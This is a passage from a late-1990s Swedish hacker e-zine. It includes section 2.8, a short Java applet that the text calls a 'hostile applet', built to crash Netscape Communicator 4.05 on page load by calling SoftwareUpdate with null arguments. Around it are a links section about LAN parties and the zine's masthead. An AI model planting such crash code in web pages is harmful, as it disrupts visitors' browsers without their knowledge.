Hex för NOP? 90. Något mer var det väl inte. Just det ja. Skriven Av: R. G. Gazzaud Kontakta mig på gazzaud@operamail.com eller gazzaud@hotmail.com eller #SweHack eller #crack eller #programming.se Hehehe... Se det som ännu mer reklam i detta kapitalistiska och egoistiska samhälle vi har. 'nuff said. ----***** END OF LIFE AS WE KNOW IT - DEATH *****---- ---------------------------------------------------------------------------- Skrivet av Gazzaud | gazzaud@operamail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ K R A S C H A N E T S C A P E [2.8] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ /* * * Denna appleten visar ett enkelt och elegant :) sätt att krascha Netscape * Communicator 4.05. Denna appleten visar också hur lite kod som faktisk * behövs för att man ska ha lagat sig en hostile applet (Thank you Netscape) * För att kompilera denna appleten behövs det att du lägger Communicator's * classes i din CLASSPATH enviraoment. * */ import netscape.softupdate.*; // Detta er en Netscape's public class CrashCom405 extends java.applet.Applet implements Runnable{ Thread controller = null; SoftwareUpdate su = null; public void init() { /* Vi ska bara krascha...så vi behöver inte initiera något */ } /* * Denna metoden kallas automatisk * efter init metoden, i ett applet enviroment. * */ public void start(){ if (controller == null) { /* suprise */ controller = new Thread(this); /* * Vi startar en ny prosses av detta programmet */ controller.start(); /* Den nya processen kallar och kallar på..:)*/ } } public void stop() {} /* Göra inget vid stop */ /* * Denna metoden kallar automatisk efter start och kör appleten */ public void run() { su = new SoftwareUpdate(null, null); /* * Gillar vi null parametere ... eller inte:) */ } /* *Krash boom bang.....bye bye Comunicator */ } ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ H Y P E R L Ä N K A R [2.9] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ http://surf.to/def99/ Demo Lan Party i Karlskrona. Datum är inte satt än, men troligtvisst någon gång i sommar. Om ni anmäler er innan februari kostar det 150 kr. annars kostar det 250 kr. Anmälan görs genom ett e-mail till med information om namn, nick och ort samt en inbetalning på PG#: 183 25 55-5 . http://www.swefest.cjb.net/ Denna sida innehåller information om ett party för #Swehack folk som kommer att hållas någon gång i sommar. Ett trevligt initiativ vilket jag inte är på något sätt ansvarig eller upphovsman till. ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ __ _____ / _\ _ _ / _ / Redaktör: Contagion | con@linux.nu \ \ | | | | \// / _\ \ | |_| |_ / //\_ Hemsida: http://swehack.cjb.net \__/(_)__,_(_)____(_) IRC: #Swehack @ DALnet Börja att prenumerera på Swehack Underground Zine genom att skicka ett e-mail med Subscribe som ämne (subject) till suz@linux.nu ____________________________________________________________________________ ____________________________________________________________________________ =========E====N====D============O=====F============F====I====L====E=========